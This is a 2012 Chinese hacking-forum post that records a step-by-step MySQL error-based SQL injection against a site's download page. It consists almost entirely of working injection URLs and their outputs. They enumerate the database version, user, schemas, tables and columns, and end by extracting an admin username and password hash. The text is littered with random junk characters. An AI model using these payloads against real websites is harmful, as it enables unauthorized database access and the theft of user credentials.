找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2178|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
) U6 [! X4 j: s* n# |* [. c$ O  e! _; x  v' Y
之前想找个测试 没想到这有 可以测试下做个记录而已
- j4 i1 ?- x6 }* V; {* x' _( `" R# T1 N" v) l! M3 I
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
$ @4 c2 B$ j* r* \( i4 g0 A) N" c
/data0/htdocs/leqi_new/app/myapp.php) j9 [7 R/ w! w0 U* X0 t
3 ?7 i. F% O* M' M7 ^4 c9 P" {9 O
或者
2 d& K, r2 d3 p5 J$ c
. j4 D4 M* `# I0 x# E/**********version()**********/ 5.1.49-log( v9 T; b. e; @+ h( f% }# y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( u+ T# z2 u; g- q8 g/ \
2 T8 M: }. S; G3 |7 V
/**********user()**********/  5 x3 z! U4 \- U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 ^& k4 \1 |8 @. F; V/ H" w
+ [7 ]0 a6 U1 i/**********database()**********/  leqi
; Q, g3 F4 w; T7 _  O: @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 y, s( @+ j; d. z: q3 E. [

& |- {5 X2 ~6 R; m8 Q7 w2 i/**********limit依次递归爆库**********/; T! G9 s" U' ]! ~6 Q( e
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: u7 k; i- Q. n; _; w  r+ w
information_schema
8 A9 r3 l) Y1 [/ d5 T2 c6 Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. R( {' p) Y* ~/ Lleqi
& y, w5 f% u; r" T7 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% x" p. ]  F9 [9 R; |test
; K" X, D' _9 m0 F7 O; e& }7 v/ y% w5 }8 O2 I
/**********limit依次递归爆表名**********/5 F% d9 T3 x0 X- ^. Y' q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; \! s7 F! x3 Q2 H
users4 f: ^3 a- M& U( p6 W

* V5 d9 \/ ~. J1 V! M/**********limit依次递归爆字段名**********/$ h) f! V1 C* i8 C5 P/ R- N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 ?) x2 m" V8 ?8 S' \/ k; }
user_id,username,nickname,passwd,group_id  ]$ |8 X6 u9 R& w( @! M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
  @8 N1 @9 t. ^) o' I: h/wapc/5000_0005_003% o1 _' [! V: z" O- X- o
11 21. W% }' P# n+ |1 k6 _0 }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 ~( `- H1 Q! f; f2 |
/wapc/5000_0005_003* }" R, l- z' i& m$ \
11 341 351 361
: V! F, T% `: Q, q$ Y/**********爆数据**********/' W+ }2 c( l: T% Q, O' v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23) O8 R; S# s% j( \1 X1 Y4 A- ^
admin$ }- R  {* ?+ E3 I, A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 q1 |& ^5 }3 X7 l' f6a8b4574ca231eb8bd52764d4978ffcd" C9 l2 S7 P; i) a

9 m, S$ e2 |% s9 |8 h* ] ( e5 [7 [8 H+ L: |* x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表